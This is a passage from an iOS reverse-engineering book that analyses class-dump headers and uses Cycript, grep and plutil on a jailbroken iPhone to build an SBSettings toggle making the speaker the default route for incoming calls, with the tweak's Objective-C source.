UICachedDeviceWhiteColor.h:  
@interface UICachedDeviceWhiteColor : UIDeviceWhi teColor 
{ 
} 
 
- (void)_forceDealloc;  
- (void)dealloc;  
- (id)copy;  
- (id)copyWithZone:(struct _NSZone *)arg1;  
- (id)autorelease;  
- (BOOL)retainWeakReference;  
- (BOOL)allowsWeakReference;  
- (unsigned int)retainCount;  
- (id)retain;  
- (oneway void)release;  
 
@end 
It inherits from UIDeviceWhiteColor, so let ’s continue with UIDeviceWhiteColor.h:  
@interface UIDeviceWhiteColor : UIColor  
{ 
    float whiteComponent;  
    float alphaComponent;  
    struct CGColor *cachedColor;  
    long cachedColorOnceToken;  
} 
 
- (BOOL)getHue:(float *)arg1 saturation:(float *)arg2 brightness:(float *)arg3 
alpha:(float *)arg4;  
- (BOOL)getRed:(float *)arg1 green:(float *)arg2 blue:(float *)arg3 alpha:(float *)arg4;  
- (BOOL)getWhite:(float *)arg1 alpha:(float *)arg2;  
- (float)alphaCom ponent; 
- (struct CGColor *)CGColor;  
- (unsigned int)hash;  
- (BOOL)isEqual:(id)arg1;  
- (id)description;  
- (id)colorSpaceName;  
- (void)setStroke;  
- (void)setFill;  
- (void)set;  
- (id)colorWithAlphaComponent:(float)arg1;  
- (struct CGColor *)_createCGColorWithAlpha:(float)arg1;  
- (id)copyWithZone:(struct _NSZone *)arg1;  
 
162 - (void)dealloc;  
- (id)initWithCGColor:(struct CGColor *)arg1;  
- (id)initWithWhite:(float)arg1 alpha:(float)arg2;  
 
@end 
UIDeviceWhiteColor inherits from UIColor. Since UICol or is a public class, stop our 
analysis at this level is enough for us to get the result. For other id type arguments, we can apply 
the same solution.  
After we have known the effect of calling a method and analyzed its arguments, we can 
write our own docum ents. I suggest you make some simple notes on the analysis results of 
private methods so that you can recall it quickly next time you use the same private method.  
Next, let’ s use Cycript to test this method and see what effect it is when we pass [UIColor 
magentaColor] as the argument.  
FunMaker -5:~ root# cycript -p SpringBoard  
cy# [[SBScreenFlash mainScreenFlasher] flashColor:[UIColor magentaColor] 
withCompletion:nil]  
A magenta flash scatters on the screen and it is much cooler than the original white flash. 
Check the album and we don ’t find a new screenshot. Therefore we guess that this method is 
just for flashing the screen without actually performing the screenshot operation. Aha, a new 
tweak inspiration arises, we can hook flashColor:withCompletion:  and pass it a custom color to 
enrich the screen flash with more colors. Also, we present it as an exercise and ask you to write a tweak.  
All above methodologies are summary of my 5 -year experience. Because there is no official 
documentations for iOS reverse engineering, my personal experiences will inevitably be biased 
and impossible to cover everything. So you are welcome to http://bbs.iosre.com for further 
discussions if you have any questions.  
5.2.6    Limitations of class -dump  
By analyzing class -dump headers, we’ve found what we are interested in. In section 5.2.4, 
we’ve seen the effect by passing two contrary arguments to [SBScreenShotter saveScreenShot:].  
In section 5.2.5, we ’ve analyzed the 1st argument of flashColor:withCompletion: in 
SBScreenFlash. From th e effect of flashColor:withCompletion:, we guess that it should happen 
inside saveScreenShot:. But if we just take class -dump headers and the private methods’  effects 
as references, we can only know the execution order of saveScreenShot: and 
 
163 flashColor:wit hCompletion:. Neither can we know anything about implementation details and 
their relationship, nor can we verify our guesses.  
So far, we should celebrate for a while since we have just finished a tweak. Starting from the 
idea, to target binaries, to inter ested methods and eventually to the tweak, all reverse 
engineering on the level of Objective -C follows this methodology; the only differences lie in 
implementation details. Even if you haven ’t worked on jailbreak development at all, you can 
still master th is methodology, it ’s nothing harder than App development. However, lower the 
threshold is, fiercer the competition is. After you have mastered methodologies of iOS reverse 
engineering on the level of Objective -C and want to step to a higher level, you will  find class -
dump is not enough. 
With a finished tweak, we still need to realize that we don ’t fully understand the knowledge 
related to this tweak, and class -dump headers is insufficient to satisfy our requirements to 
master all knowledge. It ’s like we are  in a forest, class- dump just provide us with a shelter while 
it is not able to help us go out. To find the exit, we further need a map and a compass, which are 
IDA and LLDB. But these two tools are two high mountains in front of us. Most rookie reverse 
engineers failed to climb over them and gave up in the half way. For those who have 
successfully conquered the mountains of IDA and LLDB, they have finally enjoyed a 
magnificent vista just like a dream has come true. A dream you dream alone is only a dream. A 
dream we dream together is reality. Let ’s stay together to climb over the mountains!  
5.3   An example tweak using the methodology  
Before overcoming mountains, we ’d better consolidate the knowledge learned so far. So in 
this section, we will focus on a practica l example, which covers all theories mentioned above, in 
the hope of offering you a smoother transition to chapter 6. The content of this practice is a real 
example that fully covers the development process of my iOS 6 tweak, “Speaker SBSettings 
Toggle ”, as shown in figure 5 -14. At that moment, I didn’ t know how to use IDA and LLDB, so 
all clues were from class -dump headers and guesses. This is a stage most of you will experience 
when learning iOS reverse engineering, therefore could be a very valuable refe rence. 
 
164   
Figure 5-  14 Speaker SBSettings Toggle  
Notice: The following steps no longer work on iOS 8. However, the thinking pattern is 
good to know.  
5.3.1   Get inspiration  
At the end of March 2012, I received an email from Shoghian, an Iranian -Canadian. In the 
mail, he shared an idea that iOS users could switch between microphone and speaker during a 
phone call while few people knew the speaker could be turned on by default.  This feature was 
very useful for those who were cooking, driving or inconvenient to hold the phone during a call. 
However, such a useful feature was hidden in “Settings ” → “General ” → “Accessibility”  → 
“Incoming Calls ”, which was a four -level menu (as sho wn in figure 5 -15) so the set up was very 
cumbersome. Various toggles in SBSettings are aimed to solve problems like this. So I planned 
to rewrite it as a toggle to make this good feature handier.  

 
165   
Figure 5-  15 Incoming Calls  
5.3.2   Locate files  
Since this featu re was inside Settings App, my first reaction was to look for suspicious files 
under "/Applications/Preferences.app" and "/System/Library/PreferenceBundles/". What I ’ve 
done is roughly described as follows.  
•  Change the system language to English 
Because the  iOS filesystem was in English, I had set the system language to English before 
analyzing, so that I was more likely to find correspondence between keywords from filesystem 
and keywords displayed on UI.  
•  Discover keyword "Accessibility" 
After I had changed the system language, the four -level menu has been translated from 
Chinese to “Settings ” → “General ” → “Accessibility”  → “Incoming Calls ”. The keyword 
“Accessibility”  caught my attention. The reason was that without combining the context, 
“Accessibility” wa s too generic to contain “Incoming Calls” . So I sshed to iOS and greped the 
whole filesystem with keyword “Accessibility” . The result was as follows:  
FunMaker -4s:~ root# grep -r Accessibility /        
grep: /Applications/Activator.app/Default -568h@2x~iphone.png: No such file or directory  
grep: /Applications/Activator.app/Default.png: No such file or directory  
grep: /Applications/Activator.app/Default~iphone.png: No such file or directory  
grep: /Applications/A ctivator.app/LaunchImage -700-568h@2x.png: No such file or directory  

 
166 Binary file /Applications/Activator.app/en.lproj/Localizable.strings matches  
grep: /Applications/Activator.app/iOS7 -Default-Landscape@2x.png: No such file or 
directory  
grep: /Applications/ Activator.app/iOS7 -Default-Portrait@2x.png: No such file or 
directory  
Binary file /Applications/AdSheet.app/AdSheet matches  
Binary file /Applications/Compass.app/Compass matches  
...... 
Despite so many outputs, files shown below with suffix "strings" were very  attractive to me:  
Binary file /Applications/Preferences.app/English.lproj/General -Simulator.strings 
matches 
Binary file /Applications/Preferences.app/English.lproj/General~iphone.strings matches  
Binary file /Applications/Preferences.app/General -Simulator. plist matches  
Binary file /Applications/Preferences.app/General.plist matches  
Binary file /Applications/Preferences.app/Preferences matches  
Binary file /Applications/Preferences.app/en_GB.lproj/General -Simulator.strings matches  
Binary file /Applications/Preferences.app/en_GB.lproj /General~iphone.strings matches  
If nothing went wrong, they were localization files for Apps, which should contain the code 
name of “Accessibility” . It was very convenient for us to inspect localization files with plutil. So 
let’s take a look at "/Applications/Preferences.app/English.lproj/General~iphone.strings" first.  
snakeninnys -MacBook:~ snakeninny$ plutil -p ~/General \~iphone.strings  
{ 
  "Videos..." => "• Videos..."  
  "Wallpaper" => "Wallpaper"  
  "TV_OUT" => "TV Out"  
  "SOUND_EFFECTS" => "Sound Effects"  
  "d_MINUTES" => "%@ Minutes"  
...... 
  "ACCESSIBILITY" => "Accessibility"  
  "Multitasking_Gestures" => "Multitasking Gestures"  
...... 
} 
From “ACCESSIBILITY” => “Accessibility” we could confirm that “ACCESSIBILITY”  was 
the code name. 
•  Discover General.plist 
With new clues, I re -greped the filesystem with keyword “ACCESSIBILITY” : 
FunMaker -4s:~ root# grep -r ACCESSIBILITY /  
grep: /Applications/Activator.app/Default -568h@2x~iphone.png: No such file or directory  
grep: /Applications/Activator.app/Default.png: No such file or directory  
grep: /Applications/Activator.app/Default~iphone.png: No such file or directory  
grep: /Applications/Activator.app/LaunchImage -700-568h@2x.png: No such file or directory  
grep: /Applications/ Activator.app/iOS7 -Default-Landscape@2x.png: No such file or 
directory  
grep: /Applications/Activator.app/iOS7 -Default-Portrait@2x.png: No such file or 
directory  
Binary file /Applications/Preferences.app/Dutch.lproj/General -Simulator.strings matches  
Binary file /Applications/Preferences.app/Dutch.lproj/General~iphone.strings matches  
Binary file /Applications/Preferences.app/English.lproj/General -Simulator.strings 
matches 
Binary file /Applications/Preferences.app/English.lproj/General~iphone.strings matches  
 
167 Binary file /Applications/Preferences.app/French.lproj/General -Simulator.strings matches  
Binary file /Applications/Preferences.app/French.lproj/General~iphone.strings matches  
Binary file /Applications/Preferences.app/General -Simulator.plist matches  
Binary f ile /Applications/Preferences.app/General.plist matches  
Binary file /Applications/Preferences.app/German.lproj/General -Simulator.strings matches  
Binary file /Applications/Preferences.app/German.lproj/General~iphone.strings matches  
...... 
The result was almost the same as the previous. And 
“/Application s/Preferences.app/General.plist”, which I didn ’t pay attention to a moment ago, 
was the most conspicuous one. In section 5.2.2, we ’ve particularly mentioned the concept of 
PreferenceBundle. Here, General.plist was not only a plist file, but also contained the keyword. 
So let’ s see what ’s inside.  
snakeninnys- MacBook:~ snakeninny$ plutil - p ~/General.plist  
{ 
  "title" => "General"  
  "items" => [  
    0 => { 
      "cell" => "PSGroupCell"  
    } 
    1 => { 
      "detail" => "AboutController"  
      "cell" => "PSLinkCell"  
      "label" => "About"  
    } 
    2 => { 
      "cell" => "PSLinkCell"  
      "id" => "SOFTWARE_UPDATE_LINK"  
      "detail" => "SoftwareUpdatePrefController"  
      "label" =>  "SOFTWARE_UPDATE"  
      "cellClass" => "PSBadgedTableCell"  
    } 
 ...... 
    24 => { 
      "detail" => "PSInternationalController"  
      "cell" => "PSLinkCell"  
      "label" => "INTERNATIONAL"  
    } 
    25 => { 
      "cell" => "PSLinkCell"  
      "bundle" => " AccessibilitySettings"  
      "label" => "ACCESSIBILITY"  
      "requiredCapabilities" => [  
        0 => "accessibility"  
      ] 
      "isController" => 1  
    } 
    26 => { 
      "cell" => "PSGroupCell"  
    } 
 ...... 
  ] 
} 
•  Discover AccessibilitySetting.bundle 
 
168 As expected, this file was a standard preferences specifier plist and the capitalized 
“ACCESSIBILITY”  was in the 25th item. Compared with preferences specifier plist, I had locked 
my target in the bundle of AccessibilitySettings. From the name of Accessibi litySettings, I 
guessed that this bundle assumed the responsibility for all features in Accessibility. According to 
the fixed file location theory in section 5.2.2, AccessibilitySettings must be under 
“/System/Library/PreferenceBundles/”  and we could locat e it easily.  
Took a look inside “/System/Library/PreferenceBundles/AccessibilitySetting.bundle” : 
FunMaker- 4s:~ root# ls - la 
/System/Library/PreferenceBundles/AccessibilitySettings.bundle  
total 240  
drwxr-xr-x 37 root wheel   2414 Mar 10  2013 .  
drwxr-xr-x 40 root wheel   1360 Jan 14  2014 ..  
-rw-r--r--  1 root wheel   2146 Mar 10  2013 Accessibility.plist  
-rwxr-xr-x  1 root wheel 438800 Mar 10  2013 AccessibilitySettings  
-rw-r--r--  1 root wheel    238 Dec 22  2012 BluetoothDeviceConfig.plist  
-rw-r--r--  1 root wheel    252 Mar 10  2013 BrailleStatusCellSettings.plist  
-rw-r--r--  1 root wheel   4484 Dec 22  2012 ColorWellRound@2x.png  
-rw-r--r--  1 root wheel    916 Dec 22  2012 ColorWellSquare@2x.png  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 Dutch.lproj  
drwxr-xr-x  2 root wheel    646 Dec 22  2012 English.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 French.lproj  
drwxr-xr-x  2 root wheel    646 Dec 22  2012 German.lproj  
-rw-r--r--  1 root wheel    703 Mar 10  2013 GuidedAccessSettings.plist  
-rw-r--r--  1 root wheel    807 Mar 10  2013 HandSettings.plist  
-rw-r--r--  1 root wheel    652 Mar 10  2013 HearingAidDetailSettings.plist  
-rw-r--r--  1 root wheel    507 Mar 10  2013 HearingAidSettings.plist  
-rw-r--r--  1 root wheel    383 Dec 22  2012 HomeClickSe ttings.plist  
-rw-r--r--  1 root wheel    447 Dec 22  2012 IconPlay@2x.png  
-rw-r--r--  1 root wheel   1113 Dec 22  2012 IconRecord@2x.png  
-rw-r--r--  1 root wheel    170 Dec 22  2012 IconStop@2x.png  
-rw-r--r--  1 root wheel    907 Mar 10  2013 Info.plist  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 Italian.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 Japanese.lproj  
-rw-r--r--  1 root wheel    364 Dec 22  2012 LargeFontsSettings.plist  
-rw-r--r--  1 root wheel    217 Mar 10  2013 NavigateImagesSettings.p list 
-rw-r--r--  1 root wheel   1030 Dec 22  2012 QuickSpeakSettings.plist  
-rw-r--r--  1 root wheel    346 Dec 22  2012 RegionNamesNonLocalized.strings  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 Spanish.lproj  
-rw-r--r--  1 root wheel    394 Dec 22  2012 SpeakerLoad1@2x.png  
-rw-r--r--  1 root wheel    622 Mar 10  2013 TripleClickSettings.plist  
-rw-r--r--  1 root wheel    467 Dec 22  2012 VoiceOverBrailleOptions.plist  
-rw-r--r--  1 root wheel   2477 Mar 10  2013 VoiceOverSettings.plist  
-rw-r--r--  1 root wh eel    540 Mar 10  2013 VoiceOverTypingFeedback.plist  
-rw-r--r--  1 root wheel    480 Dec 22  2012 ZoomSettings.plist  
drwxr-xr-x  2 root wheel    102 Dec 22  2012 _CodeSignature  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 ar.lproj  
-rw-r--r--  1 root wheel    8371 Dec 22  2012 bottombar@2x~iphone.png  
-rw-r--r--  1 root wheel   2701 Dec 22  2012 bottombarblue@2x~iphone.png  
-rw-r--r--  1 root wheel   2487 Dec 22  2012 bottombarblue_pressed@2x~iphone.png  
-rw-r--r--  1 root wheel   2618 Dec 22  2012 bottombarred @2x~iphone.png  
-rw-r--r--  1 root wheel   2426 Dec 22  2012 bottombarred_pressed@2x~iphone.png  
-rw-r--r--  1 root wheel   2191 Dec 22  2012 bottombarwhite@2x~iphone.png  
-rw-r--r--  1 root wheel   2357 Dec 22  2012 bottombarwhite_pressed@2x~iphone.png  
 
169 drwxr-xr-x  2 root wheel    646 Feb  7  2013 ca.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 cs.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 da.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 el.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 en_GB.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 fi.lproj  
-rw-r--r--  1 root wheel    955 Dec 22  2012 hare@2x.png  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 he.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 hr.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 hu.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 id.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 ko.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 ms.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 no.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 pl.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 pt.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 pt_PT.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 ro.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 ru.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 sk.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 sv.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 th.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 tr.lproj  
-rw-r--r--  1 root wheel    998  Dec 22  2012 turtle@2x.png  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 uk.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 vi.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 zh_CN.lproj  
drwxr-xr-x  2 root wheel    646 Feb  7  2013 zh_TW.lproj  
Here,  words like GuidedAccess, HomeClick and HearingAid corresponded with contents 
we saw in “Accessibility”  (as shown in figure 5 -16), which confirmed my speculation.  
  
Figure 5-  16 Matching keywords  
•  Discover keyword “ACCESSIBILITY_DEFAULT_HEADSET” 

 
170 In virtue of the powerful tool, grep, I searched “Incoming ” in this bundle:  
FunMaker -4s:~ root# grep -r Incoming 
/System/Library/PreferenceBundles/AccessibilitySettings.bundle  
Binary file 
/System/Library/PreferenceBundles/AccessibilitySettings.bundle/Engl ish.lproj/Accessibili
ty~iphone.strings matches  
Binary file 
/System/Library/PreferenceBundles/AccessibilitySettings.bundle/en_GB.lproj/Acces sibility
~iphone.strings matches  
The search result was very similar to the one at the beginning of this section. Open  
“/System/Library/PreferenceBundles/ 
AccessibilitySettings.bundle/English.lproj/Accessibility~iphone.strings ” and see what ’s inside.  
snakeninnys -MacBook:~ snakeninny$ plutil -p ~/Accessibility \~iphone.strings  
{ 
  "HAC_MODE_POWER_REDUCTION_N90" => "Hearing  Aid Mode improves performance with some 
hearing aids, but may reduce cellular reception."  
  "LEFT_RIGHT_BALANCE_SPOKEN" => "Left -Right Stereo Balance"  
  "QUICKSPEAK_TITLE" => "Speak Selection"  
  "LeftStereoBalanceIdentifier" => "L"  
  "ACCESSIBILITY_DEFAUL T_HEADSET" => "Incoming Calls"  
  "HEADSET" => "Headset"  
  "CANCEL" => "Cancel"  
  "ON" => "On"  
  "CUSTOM_VIBRATIONS" => "Custom Vibrations"  
  "CONFIRM_INVERT_COLORS_REMOVAL" => "Are you sure you want to disable inverted colors?"  
  "SPEAK_AUTOCORRECTIONS" =>  "Speak Auto -text" 
  "DEFAULT_HEADSET_FOOTER" => "Choose route for incoming calls."  
  "HEARING_AID_COMPLIANCE_INSTRUCTIONS" => "Improves compatibility with hearing aids in 
some circumstances. May reduce 2G cellular coverage."  
  "DEFAULT_HEADSET" => "Defaul t to headset"  
  "ROOT_LEVEL_TITLE" => "Accessibility"  
  "HEARING_AID_COMPLIANCE" => "Hearing Aid Mode"  
  "CUSTOM_VIBES_INSTRUCTIONS" => "Assign unique vibration patterns to people in 
Contacts. Change the default pattern for everyone in Sounds settings."  
  "VOICEOVERTOUCH_TEXT" => "VoiceOver is for users with  
blindness or vision disabilities."  
  "IMPORTANT" => "Important"  
  "COGNITIVE_HEADING" => "Learning"  
  "HAC_MODE_EQUALIZATION_N94" => "Hearing Aid Mode improves audio quality with some 
hearing aids."  
  "SAVE" => "Save"  
  "HOME_CLICK_TITLE" => "Home -click Speed"  
  "AIR_TOUCH_TITLE" => "AssistiveTouch"  
  "CONFIRM_ZOT_REMOVAL" => "Are you sure you want to disable Zoom?"  
  "VOICEOVER_TITLE" => "VoiceOver"  
  "OFF" => "Off"  
  "GUIDED_ACCESS_TITLE" => "Guided Ac cess" 
  "ZOOMTOUCH_TEXT" => "Zoom is for users with low -vision acuity."  
  "INVERT_COLORS" => "Invert Colors"  
  "ACCESSIBILITY_SPEAK_AUTOCORRECTIONS" => "Speak Auto -text" 
  "LEFT_RIGHT_BALANCE_DETAILS" =>  "Adjust the audio volume balance between left and 
right channels."  
  "MONO_AUDIO" => "Mono Audio"  
  "CONTRAST" => "Contrast"  
  "ZOOM_TITLE" => "Zoom"  
  "TRIPLE_CLICK_HEADING" => "Triple -click" 
 
171   "OK" => "OK"  
  "SPEAKER" => "Speaker"  
  "AUTO_CORRECT_TEXT" => "Automatically speak auto -corrections  
and auto -capitalizations."  
  "HEARING" => "Hearing"  
  "LARGE_FONT" => "Large Text"  
  "CONFIRM_VOT_USAGE" => "VoiceOver"  
  "CONFIRM_VOT_REMOVAL" => "Are you sure you want to disable VoiceOver?"  
  "HEARING_AID_TITLE" => "Hearing Aids"  
  "FLASH_LED" => "LED Flash for Alerts"  
  "VISION" => "Vision"  
  "CONFIRM_ZOOM_USAGE" => "Zoom"  
  "DEFAULT" => "Default"  
  "MOBILITY_HEADING" => "Physical & Motor"  
  "TRIPLE_CLICK_TITLE" => "Triple -click Home"  
  "RightStereoBalanceIdentif ier" => "R"  
}  
 “ACCESSIBILITY_DEFAULT_HEADSET ” => “Incoming Calls”  gave me a very clear hint 
to continue the search.  
•  Locate Accessibility.plist 
As you think, I ’ve searched “ACCESSIBILITY_DEFAULT_HEADSET ”: 
FunMaker -4s:~ root# grep -r ACCESSIBILITY_DEFAULT_HEADSET 
/System/Library/PreferenceBundles/AccessibilitySettings.bundle  
Binary file 
/System/Library/PreferenceBundles/AccessibilitySettings.bundle/Accessibility.plist 
matches 
Binary file 
/System/Library/Pre ferenceBundles/AccessibilitySettings.bundle/Dutch.lproj/Accessibility
~iphone.strings matches  
...... 
All were localization files except one plist file. So that should be what I was look for. Its 
contents are as follows: 
snakeninnys -MacBook:~ snakeninny$ plutil -p ~/Accessibility.plist  
{ 
  "title" => "ROOT_LEVEL_TITLE"  
  "items" => [  
    0 => { 
      "label" => "VISION"  
      "cell" => "PSGroupCell"  
      "footerText" => "AUTO_CORRECT_TEXT"  
    } 
    1 => { 
      "cell" = > "PSLinkListCell"  
      "label" => "VOICEOVER_TITLE"  
      "detail" => "VoiceOverController"  
      "get" => "voiceOverTouchEnabled:"  
    } 
    2 => { 
      "cell" => "PSLinkListCell"  
      "label" => "ZOOM_TITLE"  
      "detail" => "ZoomController"  
      "get" => "zoomTouchEnabled:"  
 
172 } 
...... 
    18 => { 
      "cell" => "PSLinkListCell"  
      "label" => "HOME_CLICK_TITLE"  
      "detail" => "HomeClickController"  
      "get" => "homeClickSpeed:"  
    } 
    19 => { 
      "detail" => "PSListItemsController"  
      "set" => "accessibilitySetPreference:specifier:"  
      "validValues" => [  
        0 => 0 
        1 => 1 
        2 => 2 
      ] 
      "get" => "accessibilityPreferenceForSpecifier:"  
      "validTitles" => [  
        0 => "DEFAULT"  
        1 => "HEADSET"  
        2 => "SPEAKER"  
      ] 
      "requiredCapabilities" => [  
        0 => "telephony"  
      ] 
      "cell" => "PSLinkListCell"  
      "label" => "ACCESSIBILITY_DEFAULT_HEADSET"  
      "key" => "DefaultRouteForCall"  
    } 
  ] 
} 
It was another standard preferences specifier plist and I knew that the getter and setter for 
“Incoming Calls ” were accessibilitySetPreference:specifier: and 
accessibilityPreferenceForSpecifier:. So it was time to move on to the next step.  
5.3.3    Locate methods and functions  
According to preferences specifier plist, when selecting a row in “Incoming calls” , its setter, 
i.e. accessibilitySetPreference:specifier: would get called. However, a problem came up that this 
method was in AccessibilitySettings.bundle, I didn’ t know how to load this bundle into memory 
at that time and as a result, I wasn ’t able to call the method. What ’s even worse, I didn ’t know 
how to use IDA and LLDB while there was nothing helpful in class- dump headers. I felt this 
problem was far beyond  my ability and couldn’ t get solved in a short time. So I ’ve sent a 
complaint email to Shoghian frustratingly, as shown in figure 5 -17. 
 
173   
Figure 5-  17 A complaint email to Shoghian  
I was stuck on this problem for nearly half a month. During that period, I was always 
thinking, what could iOS do inside the setter? Since preferences specifier plist used 
PostNotification to notify changes of configuration files to other processes, and th e 
configuration of AccessibilitySettings was associated with MobilePhone, which happened to be 
the mode of inter -process communication. Would accessibilitySetPreference:specifier: change 
the configuration file and post a notification? To verify my guesses,  I made use of 
LibNotifyWatch by limneos to observe if there were any related notifications through manually 
changing the configuration of “Incoming Calls” . Unexpectedly, it really made me a lucky hit.  
FunMaker -4s:~ root# grep LibNotifyWatch: /var/log/sysl og 
 Nov 26 00:09:20 FunMaker -4s Preferences[6488]: LibNotifyWatch: <CFNotificationCenter 
0x1e875600 [0x39b4b100]> postNotificationName:UIViewAnimationDidCommitNotification 
object:UIViewAnimationState userInfo:{  
Nov 26 00:09:20 FunMaker -4s Preferences[6488] : LibNotifyWatch: <CFNotificationCenter 
0x1e875600 [0x39b4b100]> postNotificationName:UIViewAnimationDidStopNotification 
object:<UIViewAnimationState: 0x1ea74f20> userInfo:{  
...... 
Nov 26 00:09:21 FunMaker -4s Preferences[6488]: LibNotifyWatch: 
CFNotificationCe nterPostNotification center=<CFNotificationCenter 0x1dd86bd0 
[0x39b4b100]> name=com.apple.accessibility.defaultrouteforcall userInfo=(null) 
deliverImmediately=1  
Nov 26 00:09:21 FunMaker -4s Preferences[6488]: LibNotifyWatch: notify_post 
com.apple.accessibil ity.defaultrouteforcall  
...... 
I’ve found two notifications named “com.apple.accessibility.defaultrouteforcall ”. 
Combining them with previous mentioned deductions, there was no need to further explain. 

 
174 After finding the most suspicious notification, I still had one more question: Where was the 
configuration file?  
In chapter 2, I have mentioned that there were plenty of user data in “/var/mobile/” . All 
App related data were in “/var/mobile/Containers” ; all media files were in 
“/var/mobile/Media/” ; and in “/var /mobile/Library/”, we can easily find the directory 
“/var/mobile/library/Preferences/” then further locate “com.apple.Accessibility.plist” , whose 
contents are as follows:  
snakeninnys- MacBook:~ snakeninny$ plutil - p ~/com.apple.Accessibility.plist  
{ 
 ...... 
  "DefaultRouteForCallPreference" => 2  
  "VOTQuickNavEnabled" => 1  
  "CurrentRotorTypeWeb" => 3  
  "PunctuationKey" => 2  
 ...... 
  "ScreenCurtain" => 0  
  "VoiceOverTouchEnabled" => 0  
  "AssistiveTouchEnabled" => 0  
} 
Change the configuration of “Incoming Calls”  then observe the variation of 
DefaultRouteForCallPreference, we can easily conclude that 0 corresponds to default, 1 
corresponds to headset, 2 corresponds to speaker, which totally matches the contents of 
Accessibility.plist.  
5.3.4    Test methods and functions  
After a long period of deduction, I have eventually got a feasible solution. With only a few 
lines of code, I can modify the configuration file and post a notification, and it ’s done. Does it 
really work? When I was writing the following code, I felt both nervous and exciting. (At that 
time I didn ’t know how to use Cycript, so I wrote a test tweak instead).  
%hook SpringBoard  
- (void)menuButtonDown:(id)down  
{ 
 %orig;  
 NSMutableDictionary *dictionary = [NSMutableDictionary 
dictionaryWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple. 
Accessibility.plist"];  
 [dictionary setObject:[NSNumber numberWithInt:2] 
forKey:@"DefaultRouteForCallPreference"];  
 [dictiona ry writeToFile:@"/var/mobile/Library/Preferences/com.apple. 
Accessibility.plist" atomically:YES];  
 notify_post("com.apple.accessibility.defaultrouteforcall");  
}         
%end  
 
175 After compiling, installing and respring, I pressed home button with my eyes closed, and 
then checked “ Settings ” → “General ” → “Accessibility”  → “Incoming Calls ” with excitement. Aha, 
“Speaker”  was chosen. I ’ve made it! 
5.3.5    Write tweak  
Since the core function  has been verified, writing code was a piece of cake. Following 
SBSettings toggle spec ( http://thebigboss.org/guides- iphone- ipod- ipad/sbsettings- toggle -spec ), 
the contents of Tweak.xm are as follows. 
#import <notify.h>  
#define ACCESSBILITY @"/var/mobile/Library/Preferences/com.apple.Accessibility.plist"  
 
// Required  
extern "C" BOOL isCapable() {  
 if (kCFCoreFoundationVersionNumber > = kCFCoreFoundationVersionNumber_iOS_5_0 && 
[[[UIDevice currentDevice] model] isEqualToString:@"iPhone"])  
  return YES;  
 return NO;  
} 
 
// Required  
extern "C" BOOL isEnabled() {  
 NSMutableDictionary *dictionary = [[NSMutableDictionary alloc] initWithCont 
entsOfFile:ACCESSBILITY];  
 BOOL result = [[dictionary objectForKey:@"DefaultRouteForCallPreference"] 
intValue] == 0 ? NO : YES;  
 [dictionary release];  
 return result;  
}  
 
// Optional 
// Faster isEnabled. Remove this if it ’s not necessary. Keep it if isEnabled() is 
expensive and you can make it faster here.  
extern "C" BOOL getStateFast() {  
 return isEnabled();  
}  
 
// Required  
extern "C" void setState(BOOL enabled) {  
 NSMutableDi ctionary *dictionary = [[NSMutableDictionary alloc] initWithCont 
entsOfFile:ACCESSBILITY];  
 [dictionary setObject:[NSNumber numberWithInt:(enabled ? 2 : 0)] forKey:@"D 
efaultRouteForCallPreference"];  
 [dictionary writeToFile:ACCESSBILITY atomically:YES];  [dictionary release];  
 notify_post("com.apple.accessibility.defaultrouteforcall");  
}  
 
// Required  
// How long the toggle takes to toggle, in seconds.  
extern "C" float getDelayTime() {  
 return 0.6f;  
} 
 
176 Because the inspiration of this tweak came from Shoghian, I ’ve signed his name as the 
coauthor, as shown in figure 5 -18. He was very happy and hence we made friends with each 
other. Speaker SBSettings Toggle is my third public tweak on Cydia, with very simple functions 
and no advertising, it still accum ulated nearly 10,000 downloads, (as shown in figure 5- 19), 
which was a happy ending. More importantly, it was unexpectedly exhausting writing this tweak. My target looked so simple until I really got my hands dirty, which gave me a warning 
that actions spoke louder than words, I still had a long way to go. Not until the similar situations 
happened again and again in later days then I finally realized that class -dump was only a 
supporting role in iOS reverse engineering, and it indirectly encouraged me to di g into IDA and 
LLDB, which helped me step onto a new stage in iOS reverse engineering.  
  
Figure 5-  18 Shoghian is the coauthor  
  
Figure 5-  19 Neary 10,000 downloads  
5.4   Conclusion  
In this chapter, we’ ve comprehensively introduced how a tweak works as well as the 
thought and process of writing a tweak, accompanied with practical examples, I believe these 
contents can help beginners learn iOS reverse engineering better. iOS reverse engineering in 

 
177 Objective -C level is the first hurdle of this book; without knowin g IDA and LLDB, we are not 
able to go very deep into iOS reverse engineering, and our thinking logic is somehow 
disordered. I think you can feel from the example that our ability at that stage is not adequate to 
conduct elegant reverse engineering on binar ies, so we have to guess a lot when we encounter 
problems. Although the code we wrote just now was far cry from the official implementation, it worked at least. The only reason is that Objective -C method names are very readable and 
